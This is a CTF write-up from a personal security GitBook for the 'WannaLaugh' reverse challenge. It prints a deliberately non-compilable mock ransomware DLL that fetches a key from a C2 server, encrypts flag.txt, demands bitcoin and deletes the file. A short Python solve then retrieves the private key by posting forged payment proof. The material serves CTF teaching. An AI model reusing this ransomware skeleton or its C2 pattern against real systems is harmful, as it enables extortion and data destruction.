😴
gatari
  • πŸ‘‹root@gatari
  • πŸ”«Active Directory (Boxes)
    • Access Walkthrough
  • πŸ”΄Red Team
    • What is Windows Defender?
    • Post-Exploitation on Disk
    • Command and Control (C2)
      • Signatured by Default
      • Bring Your Own Loader
    • Creating A C2 Framework
      • Prototyping
      • Interfaces
      • Endpoints & Listeners
  • 🚩CTF Writeups
    • 🀑GCTF 2022
      • πŸͺ„ret2secret
      • 🀑login
    • 🀑LNC 2023
      • πŸ‘½Alien Portal
    • 🀑Gryphons Mini-CTF 2023
      • πŸ‘¨β€πŸ’»Web
        • πŸ₯ΆChill
        • πŸͺ Leaked Login
        • πŸͺCookie Monster
        • ✈️Traveller
        • 🀯Headers
      • ☠️Pwn
        • 🐱Netcat
        • πŸ‘¨β€πŸ’»Login
        • πŸ‘©β€πŸ’»Login 2
        • πŸ§‘β€πŸ’»Login 3
      • βͺReverse
        • πŸ”«Valorant Aimbot
        • 🀣WannaLaugh
        • πŸͺšHacksaw
        • 🀫Secret
        • ❓Command & ...POST?
        • πŸ’€Bruh
      • 🧠Sanity Check
        • πŸ‡¨πŸ‡³ζ—©δΈŠε₯½δΈ­ε›½
        • πŸͺ‘Needle in a Haystack(s)
      • πŸ“€Crypto
        • 🀦Ascee? Asskey?
  • πŸ“˜Reviews
    • 😭CRTO - Certified Red Team Operator
Powered by GitBook
On this page
  • Background Knowledge
  • Solution
  1. CTF Writeups
  2. Gryphons Mini-CTF 2023
  3. Reverse

WannaLaugh

3 Solves

PreviousValorant AimbotNextHacksaw

Last updated 1 year ago

Oh no, my computer has been attacked by WannaLaugh !!, What do I do?? My flag.txt has been encrypted :((

How will I ever see my monkeys again...

Background Knowledge

This challenge is a grossly simplified play/recreation of the infamous ransomware "WannaCry"

It would be great to have prior experience in malware development, and basic asymmetric encryption with PKI infrastructure.

The awful malware presented in this challenge features a HTTP C2 that returns the fields required to encrypt a victim's file system. After a ransom is paid, the victim will gain access to a private key via a secured endpoint on the C2 server, after which the files can be decrypted.

Solution

The player is given an implant.cpp, which is compiled into a dll and injected into a process on the victim

#include <windows.h>
#include <stdio.h>
#include <wininet.h>
#include <string>
#include <iostream>
#include <fstream>
#include <filesystem>

#include <rsa.h> 
// ensure that even if some troll decides to compile and run, it will throw unknown function errors :)
#include <ransom.h>

#pragma comment(lib, "wininet.lib")

#ifdef MYDLL_EXPORTS
#define MYDLL_API __declspec(dllexport)
#else
#define MYDLL_API __declspec(dllimport)
#endif


std::string HttpGet(const char* url)
{
    HINTERNET hInternet = InternetOpenA("MyApp", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    HINTERNET hUrl = InternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_RELOAD, 0);
    std::string result;
    char buffer[1024];
    DWORD bytesRead;
    while (InternetReadFile(hUrl, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0)
    {
        result.append(buffer, bytesRead);
    }

    InternetCloseHandle(hUrl);
    InternetCloseHandle(hInternet);

    return result;
}

std::string HttpPost(const char* url, const char* data)
{
    HINTERNET hInternet = InternetOpenA("MyApp", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    HINTERNET hUrl = InternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_RELOAD, 0);
    std::string result;
    char buffer[1024];
    DWORD bytesRead;
    while (InternetReadFile(hUrl, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0)
    {
        result.append(buffer, bytesRead);
    }

    InternetCloseHandle(hUrl);
    InternetCloseHandle(hInternet);

    return result;
}
extern "C" MYDLL_API std::string encrypt(char* data, int size, std::string key)
{
    return (RSA.encrypt(data, size, key));
}

extern "C" MYDLL_API void decrypt(char* enc_data, int size, std::string key)
{
    return (RSA.decrypt(enc_data, size, key));
}

extern "C" MYDLL_API void Ransom(char* data)
{
    std::string public_key;
    std::string private_key;

    char buffer[1024];
    DWORD bytesRead;
    std::ifsteam inputFile("flag.txt");

    if (inputFile.is_open())
    {
        inputFile.read(buffer, sizeof(buffer));
        bytesRead = inputFile.gcount();
        inputFile.close();
    }
    else { return; }

    public_key = HttpGet("http://157.230.251.0:6002/key");

    std::string enc_data = encrypt(buffer, bytesRead, public_key);
    std::ofstream outputFile("flag.txt");
    MessageBoxA(NULL, "Hello, your flag.txt has been encrypted.", NULL, MB_OK);

    if (outputFile.is_open())
    {
        outputFile << enc_data;
        outputFile.close();
    }
    else { return; }

    const std::filesystem::path filePath = "flag.txt";

    const auto fileSize = std::filesystem::file_size(filePath);
    // because i'm nice, fileSize returns an integer value of 512.

    const auto ransom = fileSize * 0.000028

    std::cout << "Please pay 15 BTC to 157.230.251.0" << std::endl;

    if (await.Ransom::payment() == true)
    {
        std::cout << "Payment received, decrypting file..." << std::endl;
        std::string proof;
        proof = {
            "amount": ransom,
            "fsize": fileSize,
        }
        private_key = HttpPost("http://157.230.251.0:6002/btc_transaction", proof);
        decrypt(enc_data, fileSize, private_key);
        std::cout << "File decrypted, enjoy!" << std::endl;
    }
    else
    {
        Sleep(8640);
        std::cout << "Payment not received, file will be deleted in 24 hours." << std::endl;
        Sleep(8400000)
        std::filesystem::remove(filePath);
    }

}


BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
public_key = HttpGet("http://157.230.251.0:6002/key");
...
std::string enc_data = encrypt(buffer, bytesRead, public_key);
std::ofstream outputFile("flag.txt");

This is where the bulk of the ransomware is happening. In an actual attack, the entire filesystem will be encrypted instead of just "flag.txt".

std::cout << "Please pay 15 BTC to 157.230.251.0" << std::endl;
if (await.Ransom::payment() == true)
{
    std::cout << "Payment received, decrypting file..." << std::endl;
    std::string proof;
    proof = {
        "amount": ransom,
        "fsize": fileSize,
    }
    private_key = HttpPost("http://157.230.251.0:6002/btc_transaction", proof);
    decrypt(enc_data, fileSize, private_key);
    std::cout << "File decrypted, enjoy!" << std::endl;
}

And, this condition is met only after the transaction is paid. It seems like the /btc_transaction takes in a field "proof", which points to 2 variables: fileSize & ransom.

const auto fileSize = std::filesystem::file_size(filePath);
// because i'm nice, fileSize returns an integer value of 512.
const auto ransom = fileSize * 0.000028

The challenge author was nice enough to give you the required values for the proof, of course this secret proof would be a lot better in actual malware...

The solution is to retrieve the private_key and decrypt the flag.txt

solve.py
from requests import get, post 
from Cryptodome.Cipher import PKCS1_OAEP
from Cryptodome.PublicKey import RSA
ip = "http://157.230.251.0:6002"


encflag = bytes.fromhex(open('encrypted_flag.txt', 'r').read())
privk = post(ip+"/btc_transaction",json={'amount':512 * 0.000028 ,'fsize':512}).content
pki = RSA.import_key(privk)

print(PKCS1_OAEP.new(pki).decrypt(encflag).decode())
# CTF101{wANN4cR7_rAns0mW4r3_fR0M_w1sH.c0m}
🚩
🀑
βͺ
🀣
monke